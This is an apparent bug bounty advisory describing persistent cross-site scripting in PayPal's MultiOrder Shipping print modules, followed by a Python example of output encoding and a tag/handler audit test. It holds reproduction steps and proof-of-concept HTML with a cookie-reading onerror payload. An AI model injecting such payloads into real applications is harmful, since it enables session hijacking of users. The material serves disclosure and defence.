PayPal Bug Bounty Reward – Print Layout Vulnerabilities


At the end of July, the Vulnerability Laboratory research team discovered multiple persistent input validation web vulnerabilities in an official PayPal Inc core web-application module. The vulnerabilities are located in the Print Packing Slips and Print Selected modules and are triggered when a POST request carrying manipulated itemno, orderno, order or description parameters is processed.

A remote attacker can inject a malicious payload (script code) as profile shipping pickup values or item details. The effect of the injection is visible only in the print output of the application, and the payload executes from the bottom of the generated print results list. Exploitation of the persistent web vulnerability requires a low-privileged web application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishing, persistent external redirects, persistent loading of malicious script code or persistent manipulation of the web module context.

Vulnerable Service(s):
[+] PayPal Inc - PayPal MultiOrder Shipping Application (Core & API)

Vulnerable Module(s):
[+] Print Packing Slips
[+] Print Selected Context

Vulnerable Parameter(s):
[+] itemno
[+] orderno
[+] description

Affected Module(s):
[+] Print Listing - All or Selected
[+] Print Bottom Listing (Separate)

Manual steps to reproduce the remote vulnerability:

1. Register a US PayPal account and activate the shipping tools module
2. Open it and inject your own script code as payload in the order number, item number and description
3. Open the Print Packing Slips or Print Selected module to list the already injected payload
4. A new separate window opens with the selected values of the shipping request for printing
5. The injected payload is executed at the bottom of the print listing
6. Successfully reproduced!

PoC: PACKING SLIP - Print All

<tr><td width="1*"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips%20-poc_files/honey8.htm" 
border="0"></td><td 
valign="bottom">"/><br>"/>a%20/>">
<img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips%20-poc_files/t.htm" 
onerror="prompt(document.cookie)">  a%20/>"><h1>alsfkjlan</h1><br>a%20/>"><h1>alsfkjlan</h1><br>Galveston"/>, 
TX 77550</td>
<td align="right" valign="bottom">PACKING SLIP</td></tr>
...    ...
<tr><td width="1*"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips555555_files/honey8.htm" 
border="0"></td><td 
valign="bottom">"/><br>"/>a%20/>">
<img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips555555_files/t.htm" 
onerror="prompt(document.cookie)">  a%20/>"><h1>alsfkjlan</h1><br>a%20/>"><h1>alsfkjlan</h1><br>Galveston"/>, 
TX 77550</td>
<td align="right" valign="bottom">PACKING SLIP</td></tr>
...    ...
<tr><td width="1*">&#8203;&#8203;&#8203;&#8203;&#8203;<img src="http://vulnerability-lab.com/honey8.html" 
border="0"></td><td valign="bottom">"/><br>"/>a%20/>">
<img src="t.png" onerror="prompt(document.cookie)">  a%20/>"><h1>alsfkjlan</h1>
&#8203;&#8203;&#8203;&#8203;&#8203;<br>a%20/>"><h1>alsfkjlan</h1><br>Galveston"
/>, TX 77550</td><td align="right" valign="bottom">PACKING SLIP</td></tr>

PoC: PACKING SLIP - Print Selected

<tr><td width="1*"><img src="PayPal%20MultiOrder%20Shipping%20-%20Print%20Packing%20Slips555555_files/honey8.htm" 
border="0"></td>
<td valign="bottom"></td><td align="right" valign="bottom">PACKING SLIP</td></tr>
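
The PoC markup above shows stored order values reaching the print view without output encoding. As an added example (not code from the advisory or from PayPal), this Python block renders a packing-slip row with and without HTML encoding and audits the result for tags or event handlers the template did not define. The row template, function names and sample order are assumptions; the description value reuses the payload shown in the PoC.

```python
from html import escape
from html.parser import HTMLParser

# Constructed sample order; the description reuses the payload shown in the PoC.
SAMPLE_ORDER = {
    "orderno": "1001",
    "itemno": "A-17",
    "description": '"/><img src="t.png" onerror="prompt(document.cookie)">',
}

# Hypothetical print-row template: it defines exactly one <tr> and three <td>.
ROW = '<tr><td>{orderno}</td><td>{itemno}</td><td valign="bottom">{description}</td></tr>'
FIELDS = ("orderno", "itemno", "description")


def render_unsafe(order):
    """Stored values written into the print view as-is (the flaw described above)."""
    return ROW.format(**{k: order[k] for k in FIELDS})


def render_safe(order):
    """Same row, with every stored value HTML-encoded at output time."""
    return ROW.format(**{k: escape(str(order[k]), quote=True) for k in FIELDS})


class TagAudit(HTMLParser):
    """Collects start tags and on* event-handler attributes in rendered HTML."""

    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def audit(html_text):
    """Return (tags, handlers) found in the rendered row."""
    parser = TagAudit()
    parser.feed(html_text)
    parser.close()
    return parser.tags, parser.handlers


def is_clean(html_text):
    """True only if the row contains the template's own tags and no handlers."""
    tags, handlers = audit(html_text)
    return tags == ["tr", "td", "td", "td"] and not handlers
```

The `is_clean` check works as a regression test for any print template: render with hostile stored values and fail the build if the parsed output contains markup the template itself does not define.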

 

 
